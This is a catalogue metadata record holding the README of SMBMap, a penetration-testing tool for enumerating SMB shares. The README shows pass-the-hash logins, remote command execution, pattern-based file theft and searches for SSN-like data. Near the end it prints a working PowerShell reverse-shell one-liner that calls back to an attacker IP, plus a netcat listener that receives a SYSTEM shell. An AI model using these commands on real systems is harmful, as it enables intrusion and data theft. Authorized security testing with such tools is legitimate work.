{"id":13475538,"url":"https://github.com/ShawnDEvans/smbmap","last_synced_at":"2025-03-27T00:31:31.225Z","repository":{"id":28802821,"uuid":"32325855","full_name":"ShawnDEvans/smbmap","owner":"ShawnDEvans","description":"SMBMap is a handy SMB enumeration tool","archived":false,"fork":false,"pushed_at":"2025-02-28T18:09:10.000Z","size":351,"stargazers_count":1868,"open_issues_count":32,"forks_count":357,"subscribers_count":64,"default_branch":"master","last_synced_at":"2025-03-26T22:06:13.328Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ShawnDEvans.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2015-03-16T13:15:00.000Z","updated_at":"2025-03-26T18:56:25.000Z","dependencies_parsed_at":"2022-07-15T21:30:47.610Z","dependency_job_id":"c0d541eb-a8cb-4eeb-a5c2-34bdb093f6c8","html_url":"https://github.com/ShawnDEvans/smbmap","commit_stats":null,"previous_names":[],"tags_count":19,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShawnDEvans%2Fsmbmap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShawnDEvans%2Fsmbmap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShawnDEvans%2Fsmbmap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ShawnDEvans%2Fsmbmap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ShawnDEvans","download_url":"https://codeload.github.com/Sh
awnDEvans/smbmap/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245760739,"owners_count":20667886,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T16:01:21.317Z","updated_at":"2025-03-27T00:31:31.217Z","avatar_url":"https://github.com/ShawnDEvans.png","language":"Python","readme":"# SMBMap\n\nSMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.\n\nSome of the features have not been thoroughly tested, so changes will be forthcoming as bugs are found. I only really find and fix the bugs while I'm on engagements, so progress is a bit slow. Any feedback or bug reports would be appreciated. 
\n\n\u003e **Note**\n\u003e SMBMap has been updated to Python3!\n\n## Installation\n\n```bash\n$ sudo pip3 install smbmap\n$ smbmap\nsmbmap\nusage: smbmap [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-s SHARE] [-d DOMAIN]\n              [-P PORT] [-v] [--admin] [--no-banner] [--no-color] [--no-update] [-x COMMAND] [--mode CMDMODE]\n              [-L | -r [PATH]] [-A PATTERN | -g FILE | --csv FILE] [--dir-only] [--no-write-check]\n              [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-F PATTERN] [--search-path PATH]\n              [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE] [--skip]\n...\n```\n\n## Features:\n- Pass-the-Hash Support\n- File upload/download/delete\n- Permission enumeration (writable share, meet Metasploit)\n- Remote Command Execution\n- Distributed file content searching (beta!)\n- File name matching (with an auto download capability)\n- Host file parser supports IPs, host names, and CIDR\n- SMB signing detection\n- Server version output\n- Kerberos support! (super beta)\n\n## Help\n```\nusage: smbmap.py [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-k] [--no-pass] [--dc-ip IP or Host] [-s SHARE] [-d DOMAIN] [-P PORT] [-v] [--signing] [--admin] [--no-banner] [--no-color] [--no-update]\n                 [--timeout SCAN_TIMEOUT] [-x COMMAND] [--mode CMDMODE] [-L | -r [PATH]] [-g FILE | --csv FILE] [--dir-only] [--no-write-check] [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-A PATTERN] [-F PATTERN]\n                 [--search-path PATH] [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE] [--skip]\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   /\"       )|\"  \\    /\"  ||   _  \"\\ |\"  \\    /\"  |     /\"\"\\       |   __ \"\\\n  (:   \\___/  \\   \\  //   |(. |_)  :) \\   \\  //   |    /    \\      (. |__) :)\n   \\___  \\    /\\  \\/.    ||:     \\/   /\\   \\/. 
   |   /' /\\  \\     |:  ____/\n    __/  \\   |: \\.        |(|  _  \\  |: \\.        |  //  __'  \\    (|  /\n   /\" \\   :) |.  \\    /:  ||: |_)  :)|.  \\    /:  | /   /  \\   \\  /|__/ \\\n  (_______/  |___|\\__/|___|(_______/ |___|\\__/|___|(___/    \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n                     https://github.com/ShawnDEvans/smbmap\n\noptions:\n  -h, --help            show this help message and exit\n\nMain arguments:\n  -H HOST               IP or FQDN\n  --host-file FILE      File containing a list of hosts\n  -u USERNAME, --username USERNAME\n                        Username, if omitted null session assumed\n  -p PASSWORD, --password PASSWORD\n                        Password or NTLM hash, format is LMHASH:NTHASH\n  --prompt              Prompt for a password\n  -s SHARE              Specify a share (default C$), ex 'C$'\n  -d DOMAIN             Domain name (default WORKGROUP)\n  -P PORT               SMB port (default 445)\n  -v, --version         Return the OS version of the remote host\n  --signing             Check if host has SMB signing disabled, enabled, or required\n  --admin               Just report if the user is an admin\n  --no-banner           Removes the banner from the top of the output\n  --no-color            Removes the color from output\n  --no-update           Removes the \"Working on it\" message\n  --timeout SCAN_TIMEOUT\n                        Set port scan socket timeout. Default is .5 seconds\n\nKerberos settings:\n  -k, --kerberos        Use Kerberos authentication\n  --no-pass             Use CCache file (export KRB5CCNAME='~/current.ccache')\n  --dc-ip IP or Host    IP or FQDN of DC\n\nCommand Execution:\n  Options for executing commands on the specified host\n\n  -x COMMAND            Execute a command ex. 
'ipconfig /all'\n  --mode CMDMODE        Set the execution method, wmi or psexec, default wmi\n\nShard drive Search:\n  Options for searching/enumerating the share of the specified host(s)\n\n  -L                    List all drives on the specified host, requires ADMIN rights.\n  -r [PATH]             Recursively list dirs and files (no share\\path lists the root of ALL shares), ex. 'email/backup'\n  -g FILE               Output to a file in a grep friendly format, used with -r (otherwise it outputs nothing), ex -g grep_out.txt\n  --csv FILE            Output to a CSV file, ex --csv shares.csv\n  --dir-only            List only directories, ommit files.\n  --no-write-check      Skip check to see if drive grants WRITE access.\n  -q                    Quiet verbose output. Only shows shares you have READ or WRITE on, and suppresses file listing when performing a search (-A).\n  --depth DEPTH         Traverse a directory tree to a specific depth. Default is 1 (root node).\n  --exclude SHARE [SHARE ...]\n                        Exclude share(s) from searching and listing, ex. --exclude ADMIN$ C$'\n  -A PATTERN            Define a file name pattern (regex) that auto downloads a file on a match (requires -r), not case sensitive, ex '(web|global).(asax|config)'\n\nFile Content Search:\n  Options for searching the content of files (must run as root), kind of experimental\n\n  -F PATTERN            File content search, -F '[Pp]assword' (requires admin access to execute commands, and PowerShell on victim host)\n  --search-path PATH    Specify drive/path to search (used with -F, default C:\\Users), ex 'D:\\HR\\'\n  --search-timeout TIMEOUT\n                        Specifcy a timeout (in seconds) before the file search job gets killed. 
Default is 300 seconds.\n\nFilesystem interaction:\n  Options for interacting with the specified host's filesystem\n\n  --download PATH       Download a file from the remote system, ex.'C$\\temp\\passwords.txt'\n  --upload SRC DST      Upload a file to the remote system ex. '/tmp/payload.exe C$\\temp\\payload.exe'\n  --delete PATH TO FILE\n                        Delete a remote file, ex. 'C$\\temp\\msf.exe'\n  --skip                Skip delete file confirmation prompt\n\nExamples:\n\n$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1\n$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20\n$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -Hh 10.1.3.30 -x 'net group \"Domain Admins\" /domain'\n```\n\n## Default Output:\n```\n$ ./smbmap.py -H 192.168.86.214 -u Administrator -p asdf1234                                         \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   /\"       )|\"  \\    /\"  ||   _  \"\\ |\"  \\    /\"  |     /\"\"\\       |   __ \"\\\n  (:   \\___/  \\   \\  //   |(. |_)  :) \\   \\  //   |    /    \\      (. |__) :)\n   \\___  \\    /\\  \\/.    ||:     \\/   /\\   \\/.    |   /' /\\  \\     |:  ____/\n    __/  \\   |: \\.        |(|  _  \\  |: \\.        |  //  __'  \\    (|  /\n   /\" \\   :) |.  \\    /:  ||: |_)  :)|.  
\\    /:  | /   /  \\   \\  /|__/ \\\n  (_______/  |___|\\__/|___|(_______/ |___|\\__/|___|(___/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authentidated session(s)                                                      \n                                                                                                                                            \n[+] IP: 192.168.86.214:445\tName: shawnevans-pc.lan   \tStatus: ADMIN!!!   \t\n\tDisk                                                  \tPermissions\tComment\n\t----                                                  \t-----------\t-------\n\tADMIN$                                            \tREAD, WRITE\tRemote Admin\n\tC$                                                \tREAD, WRITE\tDefault share\n\tIPC$                                              \tNO ACCESS\tRemote IPC\n\tMS Publisher Color Printer                        \tNO ACCESS\tMS Publisher Color Printer\n\tprint$                                            \tREAD, WRITE\tPrinter Drivers\n\tTemp                                              \tREAD, WRITE\t\n\tUsers                                             \tREAD, WRITE\n```\n\n## Command execution:\n```\n$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' 
-d ABC -x 'net group \"Domain Admins\" /domain' -H 192.168.2.50\n[+] Finding open SMB ports....\n[+] User SMB session established...\n[+] IP: 192.168.2.50:445        Name: unknown\nGroup name     Domain Admins\nComment        Designated administrators of the domain\n\nMembers\n\n-------------------------------------------------------------------------------\nabcadmin\nThe command completed successfully.\n```\n\n## Non recursive path listing (ls):\n```\n$ ./smbmap.py -H 192.168.86.214 -u Administrator -p asdf1234 -r c$ -q     \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   /\"       )|\"  \\    /\"  ||   _  \"\\ |\"  \\    /\"  |     /\"\"\\       |   __ \"\\\n  (:   \\___/  \\   \\  //   |(. |_)  :) \\   \\  //   |    /    \\      (. |__) :)\n   \\___  \\    /\\  \\/.    ||:     \\/   /\\   \\/.    |   /' /\\  \\     |:  ____/\n    __/  \\   |: \\.        |(|  _  \\  |: \\.        |  //  __'  \\    (|  /\n   /\" \\   :) |.  \\    /:  ||: |_)  :)|.  \\    /:  | /   /  \\   \\  /|__/ \\\n  (_______/  |___|\\__/|___|(_______/ |___|\\__/|___|(___/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\n                                                                                                                                            \n[+] IP: 192.168.86.214:445\tName: shawnevans-pc.lan   \tStatus: ADMIN!!!   
\t\n\tDisk                                                  \tPermissions\tComment\n\t----                                                  \t-----------\t-------\n\tADMIN$                                                 \tREAD, WRITE\tRemote Admin\n\tC$                                                    \tREAD, WRITE\tDefault share\n\t./C$\n\tdr--r--r--                0 Wed Apr 22 14:50:29 2015\t$Recycle.Bin\n\tfr--r--r--             4284 Wed Oct  3 10:16:24 2018\tActivityLog.xsl\n\tdr--r--r--                0 Tue Nov 21 10:47:06 2023\tConfig.Msi\n\tdr--r--r--                0 Thu Apr  9 14:46:57 2015\tDocuments and Settings\n\tdr--r--r--                0 Mon Feb 15 16:45:44 2021\tiDEFENSE\n\tdr--r--r--                0 Thu Sep 24 20:52:23 2015\tnasm\n\tfr--r--r--       2513149952 Tue Nov 21 13:21:16 2023\tpagefile.sys\n\tdr--r--r--                0 Thu Apr  9 14:46:48 2015\tPerfLogs\n\tdw--w--w--                0 Mon Oct 30 09:20:53 2023\tProgram Files\n\tdw--w--w--                0 Fri Nov 17 03:27:46 2023\tProgram Files (x86)\n\tdr--r--r--                0 Wed Jun 14 13:39:51 2023\tProgramData\n\tdr--r--r--                0 Mon Oct  1 12:05:49 2018\tPython27\n\tdr--r--r--                0 Thu Apr  9 13:49:31 2015\tRecovery\n\tdr--r--r--                0 Thu Oct 15 13:04:27 2015\tScripts\n\tdr--r--r--                0 Tue Nov 21 11:13:24 2023\tSystem Volume Information\n\tfr--r--r--          5194752 Mon Jan 18 11:12:13 2016\tSystem.Management.Automation.dll\n\tfr--r--r--                0 Fri May 19 13:51:42 2023\tTBIWYRVUOD.txt\n\tdr--r--r--                0 Thu Nov 23 13:04:51 2023\tTemp\n\tfr--r--r--            15812 Wed Oct  3 10:16:45 2018\ttemp.log\n\tfr--r--r--               18 Thu Feb 13 15:55:55 2020\ttest.txt\n\tdr--r--r--                0 Wed Jun 21 12:43:46 2023\tTools\n\tdw--w--w--                0 Thu Nov 23 13:04:51 2023\tUsers\n\tdr--r--r--                0 Thu Nov 23 13:04:51 2023\tWindows\n\tprint$                                            
\tREAD, WRITE\tPrinter Drivers\n\tTemp                                              \tREAD, WRITE\t\n\tUsers                                             \tREAD, WRITE\t\n```\n\n## Recursive listing \n```\n$ ./smbmap.py -H 192.168.86.179 -u Administrator -p asdf1234 -r Tools --depth 2 --no-banner -q\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\n                                                                                                                                            \n[+] IP: 192.168.86.179:445\tName: desktop-m8n2dcc.lan \tStatus: ADMIN!!!   \t\n\tDisk                                                  \tPermissions\tComment\n\t----                                                  \t-----------\t-------\n\tADMIN$                                            \tREAD, WRITE\tRemote Admin\n\tC                                                 \tREAD ONLY\t\n\tC$                                                \tREAD, WRITE\tDefault share\n\tIPC$                                              \tREAD ONLY\tRemote IPC\n\tTools                                             \tREAD, WRITE\t\n\t./Tools\n\tdr--r--r--                0 Fri Nov 24 08:51:45 2023\t.\n\tdr--r--r--                0 Fri Nov 24 08:51:45 2023\t..\n\tfr--r--r--                0 Fri May 19 13:39:58 2023\tAZNJSOWDQU\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\tCVE-2020-0688_EXP\n\tfr--r--r--            13821 Mon May 15 15:34:30 2023\tDebug.txt\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\tdiskmon\n\tfr--r--r--            13821 Mon May 15 15:34:30 2023\tErrors.txt\n\tfr--r--r--                0 Fri May 19 13:42:42 2023\tGNDBLUQZMA.txt\n\tfr--r--r--                0 Fri May 19 13:40:56 2023\tHOQVWGAXEG\n\tfr--r--r--             2833 Mon May 15 15:34:30 2023\tkiwi_passwords.yar\n\tfr--r--r--             2850 Mon May 15 15:34:30 
2023\tmimicom.idl\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\tportmon\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\tprocexplorer\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\tProcMon\n\tfr--r--r--             4951 Mon May 15 15:34:30 2023\tREADME.md\n\tfr--r--r--             4605 Mon May 15 15:34:30 2023\tREADME.txt\n\tfr--r--r--                0 Fri May 19 13:37:17 2023\tRZFNUHSYET\n\tfr--r--r--           123515 Mon May 15 15:34:30 2023\tSharePoint - URL Extensions - 18MAR2012.pdf\n\tfr--r--r--             2810 Mon May 15 15:34:30 2023\tSharePoint-UrlExtensions-18Mar2012.txt\n\tfr--r--r--          3028050 Mon May 15 15:34:30 2023\tSharePointURLBrute v1.1.exe\n\tfr--r--r--             8423 Mon May 15 15:34:30 2023\tSharePointURLBrute v1.1.pl\n\tfr--r--r--              116 Mon May 15 15:34:30 2023\tUrlsFound.txt\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\tWin32\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\tx64\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\tysoserial\n\t./Tools//CVE-2020-0688_EXP\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\t.\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\t..\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\t.git\n\tfr--r--r--             4756 Mon May 15 15:34:30 2023\tCVE-2020-0688_EXP.py\n\tfr--r--r--                0 Mon May 15 15:34:30 2023\tnopsec.test'\n\tfr--r--r--             2169 Mon May 15 15:34:30 2023\tREADME.md\n\tdr--r--r--                0 Mon May 15 15:34:30 2023\tysoserial-1.32\n\n```\n\n## Recursive Filename Pattern Search\n```\n$ ./smbmap.py -H 192.168.86.179 -u Administrator -p asdf1234 -r 'c$/program files' --depth 2 -A '(password|config)'\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   /\"       )|\"  \\    /\"  ||   _  \"\\ |\"  \\    /\"  |     /\"\"\\       |   __ \"\\\n  (:   \\___/  \\   \\  //   |(. |_)  :) \\   \\  //   |    /    \\      (. |__) :)\n   \\___  \\    /\\  \\/.  
  ||:     \\/   /\\   \\/.    |   /' /\\  \\     |:  ____/\n    __/  \\   |: \\.        |(|  _  \\  |: \\.        |  //  __'  \\    (|  /\n   /\" \\   :) |.  \\    /:  ||: |_)  :)|.  \\    /:  | /   /  \\   \\  /|__/ \\\n  (_______/  |___|\\__/|___|(_______/ |___|\\__/|___|(___/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\n[*] Performing file name pattern match!.                                                                                                    \n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.Configuration.Abstractions.dll\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Configuration.Abstractions.dll (21368 bytes)\n[+] File output to: /home/shawnevans/tools/smbmap/smbmap/192.168.86.179-C_program files_Amazon Web Services, Inc_Amazon WorkSpaces_Microsoft.Extensions.Configuration.Abstractions.dll\n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.Configuration.Binder.dll\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Configuration.Binder.dll (25464 bytes)\n[+] File output to: /home/shawnevans/tools/smbmap/smbmap/192.168.86.179-C_program files_Amazon Web Services, Inc_Amazon WorkSpaces_Microsoft.Extensions.Configuration.Binder.dll\n[+] Match found! 
Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.Configuration.dll\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Configuration.dll (27512 bytes)\n[+] File output to: /home/shawnevans/tools/smbmap/smbmap/192.168.86.179-C_program files_Amazon Web Services, Inc_Amazon WorkSpaces_Microsoft.Extensions.Configuration.dll\n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.Logging.Configuration.dll\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Logging.Configuration.dll (20344 bytes)\n\n```\n\n## Scan for SMB signing support\n```\n$ ./smbmap.py --host-file local.txt --signing\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   /\"       )|\"  \\    /\"  ||   _  \"\\ |\"  \\    /\"  |     /\"\"\\       |   __ \"\\\n  (:   \\___/  \\   \\  //   |(. |_)  :) \\   \\  //   |    /    \\      (. |__) :)\n   \\___  \\    /\\  \\/.    ||:     \\/   /\\   \\/.    |   /' /\\  \\     |:  ____/\n    __/  \\   |: \\.        |(|  _  \\  |: \\.        |  //  __'  \\    (|  /\n   /\" \\   :) |.  \\    /:  ||: |_)  :)|.  \\    /:  | /   /  \\   \\  /|__/ \\\n  (_______/  |___|\\__/|___|(_______/ |___|\\__/|___|(___/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 3 hosts serving SMB                                                                                                  \n[*] Established 3 SMB connections(s) and 2 authentidated session(s)                                                      \n[-] 192.168.86.204  \tsigning enabled (not required)\n[!] 
192.168.86.213  \tsigning disabled\n[+] 192.168.86.179  \tsigning required\n```\n## Get version info\n```\n$ ./smbmap.py --host-file local.txt -v\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   /\"       )|\"  \\    /\"  ||   _  \"\\ |\"  \\    /\"  |     /\"\"\\       |   __ \"\\\n  (:   \\___/  \\   \\  //   |(. |_)  :) \\   \\  //   |    /    \\      (. |__) :)\n   \\___  \\    /\\  \\/.    ||:     \\/   /\\   \\/.    |   /' /\\  \\     |:  ____/\n    __/  \\   |: \\.        |(|  _  \\  |: \\.        |  //  __'  \\    (|  /\n   /\" \\   :) |.  \\    /:  ||: |_)  :)|.  \\    /:  | /   /  \\   \\  /|__/ \\\n  (_______/  |___|\\__/|___|(_______/ |___|\\__/|___|(___/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https://github.com/ShawnDEvans/smbmap\n\n[*] Detected 3 hosts serving SMB                                                                                                  \n[*] Established 3 SMB connections(s) and 2 authentidated session(s)                                                      \n[+] 192.168.86.204   is running Windows 6.1 Build 7601 (name:SHAWNEVANS-PC) (domain:SHAWNEVANS-PC)\n[+] 192.168.86.213   is running Windows 6.1 Build 7601 (name:SHAWNEVANS-PC) (domain:SHAWNEVANS-PC)\n[+] 192.168.86.179   is running Windows 10.0 Build 19041 (name:DESKTOP-M8N2DCC) (domain:DESKTOP-M8N2DCC)\n\n```\n## File Content Searching:\n```\n$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' 
-d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'\n[+] Finding open SMB ports....\n[+] User SMB session established on 192.168.0.99...\n[+] User SMB session established on 192.168.0.85...\n[+] User SMB session established on 192.168.0.89...\n[+] File search started on 1 hosts...this could take a while\n[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\\Temp\\4650e5a97b9f4ca884613f4b.txt\n[+] File search started on 2 hosts...this could take a while\n[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\\Windows\\TEMP\\e0c822a802eb455f96259f33.txt\n[+] File search started on 3 hosts...this could take a while\n[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\\Temp\\0a5d352bf2bd4e288e0f8f36.txt\n[+] Grabbing search results, be patient, share drives tend to be big...\n[+] Job 1 of 3 completed on 192.168.0.85...\n[+] File successfully deleted: C$\\Windows\\TEMP\\e0c822a802eb455f96259f33.txt\n[+] Job 2 of 3 completed on 192.168.0.89...\n[+] File successfully deleted: C$\\Temp\\0a5d352bf2bd4e288e0f8f36.txt\n[+] Job 3 of 3 completed on 192.168.0.99...\n[+] File successfully deleted: C$\\Temp\\4650e5a97b9f4ca884613f4b.txt\n[+] All jobs complete\nHost: 192.168.0.85         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]\nNo matching patterns found\n\nHost: 192.168.0.89         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]\nC:\\Users\\terdf\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\JY5MGKVO\\salesmaps[1].htm\nC:\\Users\\terdf\\OldFiles\\Cache_2013522\\Content.IE5\\JY5MGKVO\\salesmaps[1].htm\n\nHost: 192.168.0.99         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]\nC:\\Users\\biffh\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L7W17OPZ\\static.olark[1].xml\nC:\\Users\\biffh\\AppData\\Local\\Temp\\Temporary Internet 
Files\\Content.IE5\\MIY2POGJ\\validation[2].js\nC:\\Users\\biffh\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\NV1MNBWA\\Docs[1].htm\nC:\\Users\\biffh\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\NV1MNBWA\\Salesmaps[1].htm\n```\n\n## Drive Listing:\nThis feature was added to complement the file content searching feature\n\n```\n$ python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L\n[!] Missing domain...defaulting to WORKGROUP\n[+] Finding open SMB ports....\n[+] User SMB session established...\n[+] IP: 192.168.1.24:445 Name: unknown\n[+] Host 192.168.1.24 Local Drives: C:\\ D:\\\n[+] Host 192.168.1.24 Net Drive(s):\n    E:      \\\\vboxsrv\\Public      VirtualBox Shared Folders\n```\n\n\n\n## Nifty Shell:\nRun a PowerShell script on the victim SMB host (change the IP in the code to your IP address, i.e. where the shell connects back to)\n```\n$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command \"function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=\"\"\"\"192.168.0.153\"\"\"\"; $port=\"\"\"\"4445\"\"\"\";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=\"\"\"\"cmd.exe\"\"\"\"  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos 
-gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out=\"\"\"\" \"\"\"\"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};\"'\n[+] Finding open SMB ports....\n[+] User SMB session established...\n[+] IP: 192.168.2.50:445        Name: unkown\n[!] Error encountered, sharing violation, unable to retrieve output\n```\n\n## Attackers Netcat Listener:\n```\n$ nc -l 4445\nMicrosoft Windows [Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nC:\\Windows\\system32\u003ewhoami\n nt authority\\system\n```\n","funding_links":[],"categories":["Tools","Uncategorized","Python","Network Tools","Python (1887)","Samba Enumerating","Awesome Penetration Testing (\"https://github.com/Muhammd/Awesome-Pentest\")"],"sub_categories":["Network Tools","Uncategorized","Network Reconnaissance Tools","Penetration Testing Report Templates","Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FShawnDEvans%2Fsmbmap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FShawnDEvans%2Fsmbmap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FShawnDEvans%2Fsmbmap/lists"}